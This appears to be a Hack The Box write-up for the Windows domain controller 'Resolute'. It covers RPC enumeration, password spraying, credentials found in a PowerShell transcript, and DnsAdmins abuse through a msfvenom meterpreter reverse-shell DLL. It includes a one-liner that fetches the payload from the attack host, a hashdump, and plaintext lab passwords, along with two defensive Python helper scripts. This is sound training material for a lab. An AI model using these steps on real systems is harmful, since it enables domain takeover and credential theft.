
HTB - Resolute
Machine Info
Resolute is a medium difficulty Windows machine that features Active Directory. An Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT AUTHORITY\SYSTEM.
Enumeration
Scope
IP Address: 10.10.10.169
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p 53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:24:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-11T02:24:32
|_ start_date: 2024-07-11T02:18:59
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h27m07s, deviation: 4h02m31s, median: 7m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-07-10T19:24:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
* Open ports: 53,88,135,139,389,445,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - LDAP - RPC - SMB - WinRM
* Versions: Windows Server 2016 Standard 14393
* Important Notes: Domain: megabank.local - FQDN: Resolute.megabank.local - 88/tcp and 389/tcp did not show up in the fast full-port sweep (at --min-rate 10000 replies get dropped), so the script scan was run against an explicit port list
DNS Enumeration
Zone transfer failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ dig axfr MEGABANK.LOCAL @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.169
;; global options: +cmd
; Transfer failed.
RPC Enumeration
I got a username list from rpcclient over a null session (rpcclient -U "%" $ip) and filtered the names out of it.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
<snip>
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
<snip>
SMB Enumeration
Anonymous login is accepted but returns no shares, and a null-session share listing with crackmapexec is denied outright.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: STATUS_ACCESS_DENIED
I also tried spraying each username as its own password, without success.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success
<snip>
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:sunita STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:abigail STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:marcus STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:sally STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:fred STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:angela STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:felicia <snip>
KERBEROS Enumeration
I tried AS-REP roasting against the user list, but nobody has pre-authentication disabled.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
Initial Access
When I had run out of the options I knew for a foothold, I decided to query the details of each user I got from rpcclient (rid.lst is the RID column cut out of the enumdomusers output, the same way users.lst was), in case a password had been left in a description field or similar.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>
We found the password Welcome123! in marko's description. Let's confirm it still works for marko.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u marko -p 'Welcome123!'
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
It seems this password no longer belongs to him (the description says it was the initial password), so I sprayed it across the user list. Before spraying, check the lockout policy (e.g. rpcclient -U "%" $ip -c getdompwinfo over the same null session); one password against each account is a single failed attempt per user, which stays under any sane threshold.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p 'Welcome123!' --continue-on-success
<snip>
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
<snip>
So we now have valid credentials, melanie:Welcome123!. Let's see if they give us remote access to the box.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u melanie -p 'Welcome123!'
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
Yes, we have :)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
f65ae23b0313053bb9xxxxxxxxxxxxxxxx
User Flag: f65ae23b0313053bb9xxxxxxxxxxxxxxxx
Privilege Escalation
When I land on a Windows box joined to Active Directory, I run bloodhound-python to collect domain data and feed it to the BloodHound GUI.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S
Start the neo4j database and then run bloodhound to open the GUI.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ sudo neo4j start
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound
Provide the collected data (the zip file) to BloodHound.
The user ryan has a profile on the box, so let's look him up in BloodHound.
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
Click on Unrolled Group Membership to see nested group membership.

ryan is a member of DNSADMINS via nested group membership, so if I can take over this account, the path to Domain Admins is clear.

I found no database, no PowerShell history file, no stored credentials and no scripts lying around. There is one trick I always apply on Windows boxes, just as on Linux: list hidden files, which dir/ls skip by default.
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sys
PSTranscripts is not a standard directory. Let's explore it.
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
That .txt file looks very interesting. Let's see.
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>
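Transcripts like this are worth grepping mechanically, because the credential sits inside a ParameterBinding value="..." string rather than on a line of its own. Below is an added example, my own code and not part of the original writeup, that unwraps transcript ParameterBinding lines and flags commands carrying plaintext credentials. Only the net use line of the sample is taken from the transcript above; the transcript header is a constructed placeholder, and the two Set-ADAccountPassword lines are from the revert.ps1 shown later on this page. The regexes are heuristics (positional net use, /user:, ConvertTo-SecureString -AsPlainText), not an exhaustive detector.

```python
import re

# Constructed excerpt laid out like a PowerShell transcript.  Only the
# ParameterBinding line is from the transcript quoted on this page; the header
# fields are placeholders for illustration.
TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!"
PS>CommandInvocation(Get-Service): "Get-Service"
>> ParameterBinding(Get-Service): name="Name"; value="dns"
**********************
"""

# Two lines from the revert.ps1 shown later on this page (same detector applies).
REVERT_PS1 = """\
Set-ADAccountPassword -Identity ryan -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Serv3r4Admin4cc123!" -Force)
Set-ADAccountPassword -Identity melanie -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Welcome123!" -Force)
"""

# Transcript line carrying a bound parameter value; the value runs to the last quote.
PARAM_RE = re.compile(r'ParameterBinding\([^)]*\):\s*name="[^"]*";\s*value="(?P<value>.*)"\s*$')
IDENTITY_RE = re.compile(r"-Identity\s+(?P<user>\S+)", re.I)

# (label, regex) heuristics.  Each regex defines a 'secret' group and may define 'user'.
PATTERNS = [
    ("net use <drive> <share> <user> <password>",
     re.compile(r"net\s+use\s+\S+\s+\\\\\S+\s+(?P<user>[^\s/]+)\s+(?P<secret>[^\s/]\S*)", re.I)),
    ("net use ... /user:<user> <password>",
     re.compile(r"net\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>[^\s/]\S*)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r'ConvertTo-SecureString\s+-AsPlainText\s+"(?P<secret>[^"]*)"', re.I)),
]


def iter_commands(text):
    """Yield (line_no, command).  Transcript ParameterBinding lines are unwrapped
    to their value=...; any other line is treated as a raw command."""
    for no, line in enumerate(text.splitlines(), 1):
        m = PARAM_RE.search(line)
        yield no, (m["value"] if m else line)


def find_credentials(text):
    """[{'line', 'kind', 'user', 'secret'}] for every command that carries a
    plaintext credential according to PATTERNS."""
    hits = []
    for no, cmd in iter_commands(text):
        for label, rx in PATTERNS:
            for m in rx.finditer(cmd):
                user = m.groupdict().get("user")
                if user is None:                 # e.g. Set-ADAccountPassword -Identity <user>
                    ident = IDENTITY_RE.search(cmd)
                    user = ident["user"] if ident else None
                hits.append({"line": no, "kind": label, "user": user, "secret": m["secret"]})
    return hits


if __name__ == "__main__":
    for src, text in (("transcript", TRANSCRIPT), ("revert.ps1", REVERT_PS1)):
        for h in find_credentials(text):
            print(f"{src}:{h['line']:<3} {h['kind']:<42} user={h['user']} secret={h['secret']}")
```

Point it at every file under C:\PSTranscripts (and at any scripts you find) rather than only the one that looks interesting; the same function handles both the transcript wrapping and bare script lines.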
Let's check whether these credentials are still valid.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u ryan -p 'Serv3r4Admin4cc123!'
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
And that gives us the ryan account.
We can now abuse ryan's membership in DnsAdmins. That group can point the DNS Server service, which runs as SYSTEM, at an arbitrary plugin DLL (the ServerLevelPluginDll setting); whoever controls that DLL runs code as SYSTEM on the domain controller and can, for example, add ryan to Domain Admins or spawn a reverse shell.
Before starting the attack, let's confirm we can restart the DNS service, since the DLL is only loaded when the service starts.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
The last ACE grants S-1-5-21-1392959593-3013219662-3596683436-1105 the rights LCRPWPDTLORC: query status (LC), start (RP), stop (WP), pause/continue (DT), interrogate (LO) and read control (RC). It does not grant DC (change config), so the plugin path cannot be set through the SCM and has to go through the DNS management RPC interface (dnscmd), which is what DnsAdmins membership gives us. The RID 1105 is 0x451, exactly the RID rpcclient listed for ryan, and the BloodHound node for ryan shows the same SID.
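To make that SID check repeatable, here is an added example (my own code, not part of the writeup) that decodes the service SDDL above: it maps each two-letter right to its service-specific meaning, builds ryan's SID from the domain SID and the RID rpcclient reported, and checks whether that SID is granted SERVICE_START and SERVICE_STOP. It only considers ACEs that name the SID directly (no group resolution), which is sufficient here because the ACE is on ryan's own SID; the domain SID is simply the ACE's account SID minus its last component.

```python
import re

# Service DACL captured on the box (output of `sc.exe sdshow DNS` above).
DNS_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
    "(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)"
)
# Domain SID = the account SID above without its last component (the RID).
DOMAIN_SID = "S-1-5-21-1392959593-3013219662-3596683436"
RYAN_RID = 0x451        # from enumdomusers: user:[ryan] rid:[0x451]
MELANIE_RID = 0x2775    # from enumdomusers: user:[melanie] rid:[0x2775]

# Meaning of the two-letter SDDL access rights when the securable object is a service.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}

# ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);[^;]*;(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)")


def account_sid(domain_sid, rid):
    """Account SID = domain SID + '-' + decimal RID."""
    return f"{domain_sid}-{int(rid)}"


def decode_rights(rights):
    """Expand 'LCRPWP...' into right names; a raw hex mask is passed through unchanged."""
    if rights.startswith("0x"):
        return {rights}
    pairs = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    return {SERVICE_RIGHTS.get(p, p) for p in pairs}


def parse_dacl(sddl):
    """[(ace_type, sid, rights_set)] for every ACE in the D: section."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    return [(m["type"], m["sid"], decode_rights(m["rights"])) for m in ACE_RE.finditer(dacl)]


def principal_rights(sddl, sid):
    """Rights granted directly to `sid` (deny ACEs subtracted).  Rights inherited
    through group membership are NOT resolved: only ACEs naming this exact SID count."""
    allowed, denied = set(), set()
    for ace_type, ace_sid, rights in parse_dacl(sddl):
        if ace_sid == sid:
            (allowed if ace_type == "A" else denied).update(rights)
    return allowed - denied


def can_restart_service(sddl, sid):
    """True when the principal may both start and stop the service."""
    return {"SERVICE_START", "SERVICE_STOP"} <= principal_rights(sddl, sid)


if __name__ == "__main__":
    for name, rid in (("ryan", RYAN_RID), ("melanie", MELANIE_RID)):
        sid = account_sid(DOMAIN_SID, rid)
        print(f"{name:<8} {sid}  restart={can_restart_service(DNS_SDDL, sid)}  "
              f"{sorted(principal_rights(DNS_SDDL, sid))}")
```

The same decoder works on any `sc.exe sdshow` output; when the interesting ACE names a group rather than a user, feed it the group SID (from BloodHound or `whoami /groups`) instead of a user SID.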

So we can stop and start the DNS service. Let's start the attack.
Generate a malicious DLL. Rather than a DLL that adds ryan to Domain Admins, I used a meterpreter reverse shell, which gives a SYSTEM session directly.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
Upload the malicious DLL to the box over WinRM.
*Evil-WinRM* PS C:\Users\ryan\Documents> upload shell.dll
Info: Upload successful!
Point the DNS server at our DLL. This writes the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters (the value revert.ps1 deletes later); the DLL is only loaded on the next start of the service.
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
Start the meterpreter listener.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
Stop and start the dns service so the DLL gets loaded. Note that a plain msfvenom DLL runs its payload from DllMain and does not export the plugin functions the DNS server expects, so the service will not come back up cleanly after the restart; fine in the lab, a visible outage anywhere else.
sc.exe stop dns
sc.exe start dns
My first attempt failed for some reason, but after a few moments I realized that a script periodically reverts everything and deletes my payload (see revert.ps1 below). So I chained the download, the dnscmd call and the service restart into a single line to get the payload executed before it was removed; shell.dll is served over HTTP from the attack box (e.g. python3 -m http.server 80 in the directory holding it).
*Evil-WinRM* PS C:\Users\ryan\Documents> curl 10.10.16.3/shell.dll -o shell.dll; dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll; sc.exe stop dns; sc.exe start dns
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8axxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
<snip>
meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
revert.ps1
This is the script that was working against us. It does the following:
* removes the ServerLevelPluginDll value and restarts the dns service
* strips ryan and melanie back to their baseline group memberships and resets the ryan, melanie and administrator passwords
It also contains the plaintext password of administrator.
PS C:\Users\Administrator> type Documents\revert.ps1
type Documents\revert.ps1
$users = Get-Content C:\Users\Administrator\Documents\users.txt
Stop-Process -Name "dns" -Force
Stop-Service -Name "dns" -Force
reg delete HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters /v ServerLevelPluginDll /f
Start-Service -Name "dns"
$groups = Get-ADPrincipalGroupMembership -Identity ryan | where {$_.Name -ne "Contractors"}
Remove-ADPrincipalGroupMembership -Identity ryan -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity ryan -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Serv3r4Admin4cc123!" -Force)
$groups = Get-ADPrincipalGroupMembership -Identity melanie | where {$_.Name -ne "Remote Management Users"}
Remove-ADPrincipalGroupMembership -Identity melanie -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity melanie -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Welcome123!" -Force)
Set-ADAccountPassword -Identity administrator -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "DontH4ckxxxxxxxx" -Force)
Access the machine as administrator with that plaintext password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u administrator -p 'DontH4ckxxxxxxxxxxx'
*Evil-WinRM* PS C:\Users\Administrator\Documents>